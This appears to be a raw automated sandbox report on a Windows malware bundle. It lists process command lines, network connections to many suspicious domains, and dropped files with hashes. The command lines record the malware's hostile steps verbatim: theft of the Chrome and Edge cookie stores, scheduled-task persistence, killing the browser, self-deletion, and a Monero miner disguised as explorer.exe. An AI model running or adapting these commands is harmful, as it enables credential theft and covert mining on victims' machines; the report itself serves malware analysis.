C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd < Pura.vssm

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 800

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 892

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe

"C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe" -a

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 848

C:\Users\Admin\AppData\Local\Temp\11111.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 904

C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe

"C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1020

C:\Windows\system32\rUNdlL32.eXe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\rundll32.exe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 992

C:\Users\Admin\AppData\Local\Temp\22222.exe

C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Roaming\fwgtarf

C:\Users\Admin\AppData\Roaming\fwgtarf

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "biRtj61UfpoGm7HHHdacryQC.exe" /f & erase "C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe" & exit

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\22222.exe

C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "biRtj61UfpoGm7HHHdacryQC.exe" /f

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=80

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe" & del C:\ProgramData\*.dll & exit

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 sokiran.xyz udp
N/A 172.67.186.105:80 sokiran.xyz tcp
N/A 8.8.8.8:53 ipinfo.io udp
N/A 34.117.59.81:443 ipinfo.io tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 37.0.8.235:80 37.0.8.235 tcp
N/A 8.8.8.8:53 music-s.xyz udp
N/A 8.8.8.8:53 iplogger.org udp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 8.8.8.8:53 google.vrthcobj.com udp
N/A 8.8.8.8:53 google.vrthcobj.com udp
N/A 34.97.69.225:53 google.vrthcobj.com udp
N/A 8.8.8.8:53 www.listincode.com udp
N/A 144.202.76.47:443 www.listincode.com tcp
N/A 37.0.11.41:80 37.0.11.41 tcp
N/A 8.8.8.8:53 www.facebook.com udp
N/A 157.240.196.35:443 www.facebook.com tcp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 8.8.8.8:53 flamkravmaga.com udp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.anderesitebrauchen.com udp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 8.8.8.8:53 i.spesgrt.com udp
N/A 185.20.227.194:80 185.20.227.194 tcp
N/A 8.8.8.8:53 www.szwbjs.com udp
N/A 136.144.41.201:80 136.144.41.201 tcp
N/A 136.144.41.201:80 136.144.41.201 tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 172.67.153.179:80 i.spesgrt.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 162.159.134.233:80 cdn.discordapp.com tcp
N/A 8.8.8.8:53 a.xyzgame.vip udp
N/A 104.21.40.13:80 a.xyzgame.vip tcp
N/A 103.155.93.196:80 www.szwbjs.com tcp
N/A 104.21.40.13:80 a.xyzgame.vip tcp
N/A 104.21.40.13:80 a.xyzgame.vip tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 104.21.40.13:443 a.xyzgame.vip tcp
N/A 127.0.0.1:50675 tcp
N/A 127.0.0.1:50677 tcp
N/A 8.8.8.8:53 flamkravmaga.com udp
N/A 157.240.196.35:443 www.facebook.com tcp
N/A 8.8.8.8:53 shpak125.tumblr.com udp
N/A 45.142.213.135:30059 tcp
N/A 74.114.154.18:443 shpak125.tumblr.com tcp
N/A 8.8.8.8:53 live.goatgame.live udp
N/A 104.21.70.98:443 live.goatgame.live tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 104.21.40.13:443 a.xyzgame.vip tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 b.xyzgame.cc udp
N/A 172.67.178.136:443 b.xyzgame.cc tcp
N/A 8.8.8.8:53 conceitosseg.com udp
N/A 45.142.213.135:30059 tcp
N/A 45.142.213.135:30059 tcp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 8.8.8.8:53 statuse.digitalcertvalidation.com udp
N/A 104.21.70.98:443 live.goatgame.live tcp
N/A 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
N/A 8.8.8.8:53 s.lletlee.com udp
N/A 172.67.176.199:443 s.lletlee.com tcp
N/A 8.8.8.8:53 crl.comodoca.com udp
N/A 151.139.128.14:80 crl.comodoca.com tcp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 8.8.8.8:53 yoshelona.xyz udp
N/A 45.142.213.135:30059 tcp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 128.1.32.84:80 128.1.32.84 tcp
N/A 8.8.8.8:53 by.dirfgame.com udp
N/A 37.0.11.41:80 37.0.11.41 tcp
N/A 104.21.78.28:80 by.dirfgame.com tcp
N/A 8.8.8.8:53 yoshelona.xyz udp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 8.8.8.8:53 iplis.ru udp
N/A 88.99.66.31:443 iplis.ru tcp
N/A 8.8.8.8:53 ol.gamegame.info udp
N/A 104.21.21.221:80 ol.gamegame.info tcp
N/A 8.8.8.8:53 yoshelona.xyz udp
N/A 8.8.8.8:53 music-s.xyz udp
N/A 88.99.66.31:443 iplis.ru tcp
N/A 74.114.154.18:443 shpak125.tumblr.com tcp
N/A 185.244.182.34:22602 185.244.182.34 tcp
N/A 77.220.213.35:52349 77.220.213.35 tcp
N/A 8.8.8.8:53 uehge4g6gh.2ihsfa.com udp
N/A 207.246.94.159:80 uehge4g6gh.2ihsfa.com tcp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 116.202.183.50:80 116.202.183.50 tcp
N/A 8.8.8.8:53 www.iyiqian.com udp
N/A 103.155.92.58:80 www.iyiqian.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 23.21.136.132:80 api.ipify.org tcp
N/A 37.0.8.225:80 tcp
N/A 8.8.8.8:53 www.fcnbycy.xyz udp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 188.225.87.175:80 www.fcnbycy.xyz tcp
N/A 8.8.8.8:53 yoshelona.xyz udp
N/A 207.246.94.159:80 uehge4g6gh.2ihsfa.com tcp
N/A 8.8.8.8:53 g-prtnrs.top udp
N/A 91.241.19.12:80 g-prtnrs.top tcp
N/A 185.230.143.16:32115 185.230.143.16 tcp
N/A 8.8.8.8:53 ivaloribar.xyz udp
N/A 212.224.105.80:80 ivaloribar.xyz tcp
N/A 45.14.49.71:18845 45.14.49.71 tcp
N/A 8.8.8.8:53 sanctam.net udp
N/A 37.0.8.225:80 tcp
N/A 185.65.135.248:58899 sanctam.net tcp
N/A 8.8.8.8:53 github.com udp
N/A 140.82.113.3:443 github.com tcp
N/A 74.114.154.18:443 shpak125.tumblr.com tcp
N/A 88.99.66.31:443 iplis.ru tcp
N/A 8.8.8.8:53 dwarimlari.xyz udp
N/A 180.69.193.102:80 conceitosseg.com tcp
N/A 178.20.42.11:80 dwarimlari.xyz tcp
N/A 8.8.8.8:53 api.ip.sb udp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 8.8.8.8:53 zedaumalev.xyz udp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 8.8.8.8:53 zasavaucov.xyz udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 77.246.145.4:80 zedaumalev.xyz tcp
N/A 185.125.18.50:80 zasavaucov.xyz tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 116.202.183.50:80 116.202.183.50 tcp
N/A 8.8.8.8:53 xtarweanda.xyz udp
N/A 8.8.8.8:53 securebiz.org udp
N/A 212.224.105.80:80 xtarweanda.xyz tcp
N/A 203.228.9.102:80 securebiz.org tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 45.142.213.135:30059 tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 8.8.8.8:53 pastebin.com udp
N/A 207.246.94.159:80 uehge4g6gh.2ihsfa.com tcp
N/A 8.8.8.8:53 yoshelona.xyz udp
N/A 104.23.99.190:443 pastebin.com tcp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 8.8.8.8:53 xmr.pool.minergate.com udp
N/A 104.26.13.31:443 api.ip.sb tcp
N/A 49.12.80.39:45700 xmr.pool.minergate.com tcp

Files

memory/2620-114-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2620-127-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2620-128-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2620-129-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2620-130-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.txt

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.txt

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.txt

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.txt

MD5 0c3f670f496ffcf516fe77d2a161a6ee
SHA1 0c59d3494b38d768fe120e0a4ca2a1dca7567e6e
SHA256 8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0
SHA512 bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.txt

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.txt

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.txt

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.txt

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/3224-139-0x0000000000000000-mapping.dmp

memory/3696-140-0x0000000000000000-mapping.dmp

memory/3952-141-0x0000000000000000-mapping.dmp

memory/2356-142-0x0000000000000000-mapping.dmp

memory/4076-143-0x0000000000000000-mapping.dmp

memory/372-144-0x0000000000000000-mapping.dmp

memory/3852-145-0x0000000000000000-mapping.dmp

memory/3104-146-0x0000000000000000-mapping.dmp

memory/1192-149-0x0000000000000000-mapping.dmp

memory/2124-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

memory/2120-154-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

memory/2976-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

memory/3092-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/1192-164-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/2620-168-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

memory/3092-166-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/2120-171-0x000000001BD60000-0x000000001BD62000-memory.dmp

memory/2620-172-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2620-173-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3092-174-0x0000000000640000-0x0000000000641000-memory.dmp

memory/2620-163-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe

MD5 0c3f670f496ffcf516fe77d2a161a6ee
SHA1 0c59d3494b38d768fe120e0a4ca2a1dca7567e6e
